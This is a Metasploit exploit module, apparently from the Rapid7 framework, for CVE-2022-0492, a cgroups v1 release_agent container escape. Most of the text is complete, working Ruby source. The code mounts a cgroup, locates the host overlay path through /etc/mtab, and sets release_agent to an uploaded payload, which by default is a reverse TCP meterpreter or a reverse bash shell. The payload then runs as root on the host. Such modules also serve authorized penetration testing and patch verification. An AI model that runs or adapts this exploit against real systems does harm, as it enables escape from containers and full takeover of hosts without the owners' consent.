This Metasploit exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability. If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system. A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.
f89ca645e9a7ab68a61d054b319e54c6af9a4e97faf0cab7987d8a5f919f6c11
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
include Msf::Post::Linux::Priv
include Msf::Post::Linux::Kernel
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Docker cgroups Container Escape',
'Description' => %q{
This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.
This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges
and bypass the namespace isolation unexpectedly.
More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.
If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,
an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent
file is owned by root, so only a user with root access can modify it.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Yiqi Sun', # discovery
'Kevin Wang', # discovery
'T1erno', # POC
],
'Platform' => [ 'unix', 'linux' ],
'SessionTypes' => ['meterpreter'],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
},
'Privileged' => true,
'References' => [
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'],
[ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
[ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'],
[ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'],
[ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'],
[ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'],
[ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'],
[ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'],
[ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'],
[ 'CVE', '2022-0492']
],
'DisclosureDate' => '2022-02-04',
'Targets' => [
['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }],
['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def base_dir
datastore['WritableDir']
end
def check
print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu')
release = kernel_release
# https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492
release_short = Rex::Version.new(release.split('-').first)
release_long = Rex::Version.new(release.split('-')[0..1].join('-'))
if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10
release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS
release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS
release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM
return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable")
end
CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS")
end
def exploit
# Check if we're already root as its required
fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root?
# create mount
folder = rand_text_alphanumeric(5..10)
@mount_dir = "#{base_dir}/#{folder}"
register_dir_for_cleanup(@mount_dir)
vprint_status("Creating folder for mount: #{@mount_dir}")
mkdir(@mount_dir)
print_status('Mounting cgroup')
cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'")
group = rand_text_alphanumeric(5..10)
group_full_dir = "#{@mount_dir}/#{group}"
vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")
mkdir(group_full_dir)
print_status("Enabling notify on release for group #{group}")
write_file("#{group_full_dir}/notify_on_release", '1')
print_status('Determining the host OS path for image')
# for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of
mtab_file = read_file('/etc/mtab')
host_path = nil
mtab_file.each_line do |line|
next unless line.start_with?('overlay') && line.include?('perdir') # upperdir
line.split(',').each do |parameter|
next unless parameter.start_with?('upperdir')
parameter = parameter.split('=')
fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1
host_path = parameter[1]
end
break
end
fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command
vprint_status("Host OS path for image: #{host_path}")
payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"
print_status("Setting release_agent path to: #{host_path}#{payload_path}")
write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"
print_status("Uploading payload to #{payload_path}")
if target.name == 'CMD'
# for whatever reason it's unhappy and wont run without the /bin/sh header
upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"
elsif target.name == 'BINARY'
upload_and_chmodx payload_path, generate_payload_exe
end
register_files_for_cleanup(payload_path)
print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")
cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'"))
end
def cleanup
if @mount_dir
vprint_status("Cleanup: Unmounting #{@mount_dir}")
cmd_exec("umount '#{@mount_dir}'")
end
super
end
end